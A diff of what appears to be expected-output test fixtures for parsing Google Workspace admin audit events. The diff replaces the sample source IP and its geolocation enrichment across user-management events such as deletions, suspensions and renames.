@@ -3385,27 +3153,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 25068, + "log.offset": 25010, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3429,7 +3193,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "deletion", 
@@ -3442,27 +3206,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 25443, + "log.offset": 25384, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3486,7 +3246,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNGRADE_USER_FROM_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNGRADE_USER_FROM_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -3499,27 +3259,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 25818, + "log.offset": 25758, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3543,7 +3299,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_ENROLLED_IN_TWO_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_ENROLLED_IN_TWO_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -3556,27 +3312,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 26207, + "log.offset": 26146, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3600,7 +3352,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_USERLIST_CSV\"}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_USERLIST_CSV\"}}", "event.provider": "admin", "event.type": [ "info" 
@@ -3611,26 +3363,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 26609, + "log.offset": 26547, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3651,7 +3399,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MOVE_USER_TO_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MOVE_USER_TO_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -3666,27 +3414,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 26930, + "log.offset": 26867, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3710,7 +3454,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -3724,27 +3468,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 27389, + "log.offset": 27325, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3768,7 +3508,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RENAME_USER\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RENAME_USER\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -3782,27 +3522,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 27834, + "log.offset": 27769, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3826,7 +3562,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_STRONG_AUTH\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_STRONG_AUTH\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -3839,27 +3575,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 28244, + "log.offset": 28178, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3883,7 +3615,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -3896,27 +3628,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 28638, + "log.offset": 28571, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3940,7 +3668,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -3953,27 +3681,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 29014, + "log.offset": 28946, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3997,7 +3721,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNDELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNDELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "creation", 
@@ -4010,27 +3734,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 29392, + "log.offset": 29323, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -4054,7 +3774,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNSUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNSUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -4067,27 +3787,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 29769, + "log.offset": 29699, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -4111,7 +3827,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPGRADE_USER_TO_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPGRADE_USER_TO_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
